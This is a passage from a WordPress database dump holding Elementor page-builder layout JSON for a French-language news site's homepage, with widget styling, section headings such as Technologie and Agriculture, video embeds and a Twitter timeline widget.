dth\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2388,766,'_elementor_version','0.4'),(2389,766,'_elementor_css','a:3:{s:4:\"time\";i:1509371582;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2391,767,'_elementor_edit_mode','builder'),(2392,767,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2393,767,'_elementor_version','0.4'),(2394,767,'_elementor_css','a:3:{s:4:\"time\";i:1509371653;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2395,768,'_elementor_edit_mode','builder'),(2396,768,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"